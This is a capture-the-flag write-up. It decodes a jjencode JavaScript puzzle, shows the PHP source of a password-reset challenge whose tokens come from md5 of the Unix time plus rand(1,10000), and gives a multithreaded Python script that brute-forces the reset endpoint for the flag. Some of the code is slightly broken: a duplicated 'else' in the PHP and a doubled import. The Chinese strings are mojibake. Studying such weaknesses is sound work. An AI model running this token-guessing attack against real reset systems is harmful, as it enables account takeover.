$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+$._$+(![]+"")[$._$_]+$.$$$_+"."+(![]+"")[$._$_]+$._$+"\\"+$.__$+$.$__+$.$$$+"(\\\"\\"+$.__$+$._$$+$.__$+$._$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.$__+$.___+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$.$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.$__+"\\"+$.$__+$.___+"\\"+$.__$+$._$_+$._$$+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.__$+$.$$_+$.__+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$._$$+$.__+$.$$$_+$.$$_$+"\\"+$.$__+$.___+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.__$+$.$$$$+"\\"+$.$__+$.___+"\\"+$.__$+$._$$+$.__$+$._$+$._+"\\"+$.$__+$.___+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.__$+$.$$_+"\\"+$.$__+$.___+$.$$_$+$.$$$_+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.__$+$.$$$+$.$$_$+$.$$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.$_$+$.$$$_+"\\"+$.$__+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.$__+$.___+$.__+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.___+$.$_$+".\\\"\\"+$.$__+$.___+")"+"\"")())();

That is jjencode'd JavaScript; decoding it gives:

YoU CAN gET Some INterESted Thing If You CAN deCOde Me In tImE.

Bacon cipher (the capitalisation pattern) — I think an earlier XDCTF used it; it looked familiar either way:

XXDDCCTTFF

The source, once obtained, is very simple, but the setup is painful…

Source first:

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>绠$悊鍛樺瘑鐮侀噸缃</title>
</head>
<center><h1>绠$悊鍛樺瘑鐮侀噸缃</h1></center></br></br></br>
<form action="" method="POST">
<center>
<label for="email">绠$悊鍛橀偖绠:</label>
<input type="textbox" name="email" /></br></br></br>
<input type="submit" name="submit" value="鎻愪氦" />
</center>
</form>
<?php
require('sql.php');
require('function.php');
// Password-reset request for the (fixed) admin address.
if(!empty($_POST['email'])){
    $email = $_POST['email'];
    if($email === "omego952734@xdsec.club"){
        // verifyTime() lives in function.php (not shown); presumably the
        // 30-minute rate limit the message below refers to.
        $Time_check = verifyTime();
        // check whether the previous link is more than 30 minutes old
        if($Time_check){
            $date = time();
            // Token entropy is tiny: the current Unix second (which the client
            // can bracket from the HTTP Date header) combined with rand(1,10000)
            // gives at most ~10k candidates per guessed second, all checkable
            // against checktoken.php within the validity window.  rand() is
            // not a CSPRNG either; random_bytes()/openssl_random_pseudo_bytes()
            // with a far larger space would be needed.
            $rand=(string)rand(1,10000);
            $token = md5($date.$rand);
            // $date is an integer from time(), so the unquoted interpolation
            // is not attacker-influenced here.
            $updateDate = "UPDATE `XDctf_web_350`.`user` SET `date` =".$date." WHERE `user`.`id` = 0;";
            $query = mysql_query($updateDate);
            $updateToken = "UPDATE `XDctf_web_350`.`user` SET `token` =".'\''.$token.'\''." WHERE `user`.`id` = 0;";
            $query = mysql_query($updateToken);
            echo "<script>alert('閲嶇疆瀵嗙爜閾炬帴宸茬粡鍙戦併傛湁鏁堟湡涓30鍒嗛挓銆');</script>";
        }
        else
            echo "<script>alert('閾炬帴杩樻病杩囨湁鏁堟湡锛岃鐧诲綍閭鏌ョ湅銆');</script>";
    }
    else
        echo "<script>alert('绠$悊鍛樼殑閭鏍规湰涓嶆槸杩欎釜銆');</script>";
}
?>

checktoken.php

<?php
require('sql.php');
require('secret.php');
// $result (the email/id/token row) and $flag come from sql.php / secret.php,
// which are not shown; presumably the row the reset page updates.
if(!empty($_GET['email']) && !empty($_GET['id']) && !empty($_GET['token']))
{
    $email = $result->email;
    $id = $result->id;
    $token = $result->token;
    // $_GET['id'] only has to be non-empty; the id compared here is the stored
    // one, which is why the brute-force script sends the filler "id=0x00".
    if($id === '0'){
        if($_GET['email']===$email){
            // Strict compare against the stored md5 token.  The weakness is
            // the token's generation (time + rand(1,10000)), not this check;
            // nothing here rate-limits or expires guesses.
            if($_GET['token']===$token)
                echo $flag;
            else
                echo "token涓嶅銆";
        }
        else
            echo "閭涓嶅銆";
    }
    else
        echo "浣犳兂閲嶇疆涓涓潪鍒涘浜虹殑瀵嗙爜锛屽彲杩欏張鏈変粈涔堢敤鍛紵";
}
else
    echo "鍙傛暟涓嶅畬鏁淬";
else
echo "鍙傛暟涓嶅畬鏁淬";
?>

There is a very annoying setting here: one round lasts 30 minutes and only one reset timestamp can be obtained per round. Even using the response time, there is a few-seconds uncertainty either way, so a round often means 40,000–50,000 requests. Out of five rounds I got three usable ones; after rewriting the script to be multithreaded, 40,000 requests in 20 minutes still found nothing. In the end I messaged the author, who shortened a round to 10 minutes and dropped the bound to 1000 values; it then took about 6,000 requests — in other words, at the original 10,000 I would never have got there… Script below:

import requests
import hashlib
import Queue
import threading
import time
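url = "http://web.l-ctf.com:33333/checktoken.php?id=0x00&email=omego952734@xdsec.club&token="
# Unix time at which the reset link is believed to have been generated,
# bracketed from the reset response's Date header — hence the window below.
data = 1475406987

try:
    import Queue           # Python 2 (what this script targets)
except ImportError:
    import queue as Queue  # Python 3


def candidate_tokens(timestamp, rand_range=None):
    """Yield md5(str(timestamp) + str(r)) for every r in rand_range.

    Mirrors the server side, where $token = md5($date . $rand) with
    $rand = rand(1,10000).  The default enumerates r in 1..999 only, as the
    original script did; pass range(1, 10001) to cover the full rand() space.
    """
    if rand_range is None:
        rand_range = range(1, 1000)
    for r in rand_range:
        yield hashlib.md5((str(timestamp) + str(r)).encode("ascii")).hexdigest()


words = Queue.Queue()
# range() excludes its upper bound, so this tries data-1 and data only;
# use range(data - 1, data + 2) to also cover data+1.
for j in range(data - 1, data + 1):
    for token in candidate_tokens(j):
        words.put(url + token)
print("word suceess")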
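_found = threading.Event()  # set by whichever worker hits the token; stops all workers


def brufer(words):
    """Worker: pop candidate URLs from `words` and try each until one is accepted.

    The original called exit(0) on success, but SystemExit raised inside a
    thread only ends that thread — the other workers kept hammering the
    server.  A shared Event is used instead.  Only request failures are
    caught (the bare `except:` also swallowed KeyboardInterrupt); a failed
    URL is re-queued so transient errors do not drop candidates.
    """
    z = 1
    session = requests.Session()  # one session per worker; keep-alive instead of a new socket per URL
    while not words.empty() and not _found.is_set():
        z += 1
        if z == 1000:
            print("1000 pass")
            z = 0
        url = words.get()
        try:
            # checktoken.php reads $_GET, which PHP fills from the query string
            # regardless of the method, so a POST to this URL works.
            r = session.post(url, timeout=4)
        except requests.RequestException:
            print("[!]error:" + url)
            words.put(url)
            continue
        # Every failure message contains "token"/"參數"... except the flag itself;
        # the success criterion is simply the absence of the word "token".
        if "token" not in r.text:
            print("[*]Done" + url)
            print(r.text)
            _found.set()
            return
        time.sleep(1)
    if not _found.is_set():
        print("something error...")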
# Launch 59 workers over the shared queue (range(0,59) -> 59 threads); each
# sleeps 1 s after every request, so the aggregate rate is about 59 req/s.
for i in range(0,59):
    t = threading.Thread(target = brufer, args=(words,))
    t.start()

No comment.

misc

Running out of steam — I will write this part up when I have time…
